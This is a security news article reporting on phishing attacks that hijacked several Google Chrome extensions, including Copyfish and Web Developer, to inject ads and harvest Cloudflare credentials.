Seven more Google Chrome Extensions face hacker attacks

by Ugnius Kiguolis - -
Seven more Google Chrome Extensions face hacker attacks

Seven more Google Chrome Extensions face hacker attacks

This month was not so successful to Chrome, as its extensions have suffered multiple attacks.[1] The first attack, implemented on August 1, was related to the OCR add-on Copyfish (2.8.5).[2] The Chrome users were unlucky as the attack only affected the Google Chrome extension, not doing any damage to other browser extensions. Over 30 000 users had their browsing disrupted by intrusive ads.

The sad thing is not all users might notice that something is suspiciously wrong. These days, people are used to huge amounts of ads when watching videos or simply reading news, so even a sharp increase might not cause them to perform any actions or report the situation.

To make matters worse, many more Chrome extensions were affected by various other cyber attacks. The main symptoms of an attack are an unusually high number of advertisements displayed and online traffic manipulation.[3] It is not safe to use the extensions affected because of an increased level of cyber threats related to suspicious and illegal advertising.

The newly infected extensions include Chrometana (1.1.3), Web Developer (0.4.9), Social Fixer (20.1.1), Infinity New Tab (3.12.3), and Web Paint (1.2.1).[4] Even Virtual Private Network (VPN)[5] extensions weren’t left alone – it is believed that Chrome extensions Betternet VPN and TouchVPN had their security compromised in June.

The original Copyfish cyber-attack was implemented by deceiving its developers at A9t9 Software. An email was sent, stating that their extension was not suitable for the market anymore and will be eliminated unless it is updated.

There was a link attached, saying that more information will be given to those who click it. An unsuspecting developer followed the link and entered their Google Account password.

This was a grave mistake, as now the hackers had the password and could modify the code of the extension freely, as well as distribute the newly infected versions of the software online.

These kinds of phishing attacks[6] are implemented similarly – developers are tricked by hackers to expose their Google Account credentials, which then are used to inject modified code into the extensions by accessing said accounts.

Then, a lot of malicious advertisements and dangerous pop-ups are implemented to redirect traffic and potentially infect users’ computers with malware, which can do a lot of damage on its own.

One of the malicious activities of the infected Copyfish extension was replacing all the ads with its own, leaving the user exposed to many kinds of threats. One type of the ads was created to trick people into thinking that they need to repair their computer. It was a particular JavaScript advertisement that redirected users to pages and programs that could be used as a means to gain profit.

Luckily, Proofpoint (a cyber security leader), managed to solve the situation by removing the code that was maliciously injected. When the threatening code was analyzed, it was discovered that a remote file named ga.js was retrieved over HTTP. It was found out that the domain of the server where the code was retrieved from was generated by a domain generation algorithm.

This allowed the hackers to call additional scripts, and some of them stole the credentials of Cloudflare. In this way, Cloudflare was not able to protect the security anymore, and so the attackers could change all the ads.

The fact that Cloudflare credentials have been harvested multiple times, it is not a crazy idea to think that in the future we can expect some more similar cyber attacks.

About the author

Ugnius Kiguolis
Ugnius Kiguolis - Team leader

Ugnius Kiguolis is an IT specialist, the team leader, and the founder of He has worked in the IT area for over 20 years.

Contact Ugnius Kiguolis
About the company Esolutions


now online
Like us on Facebook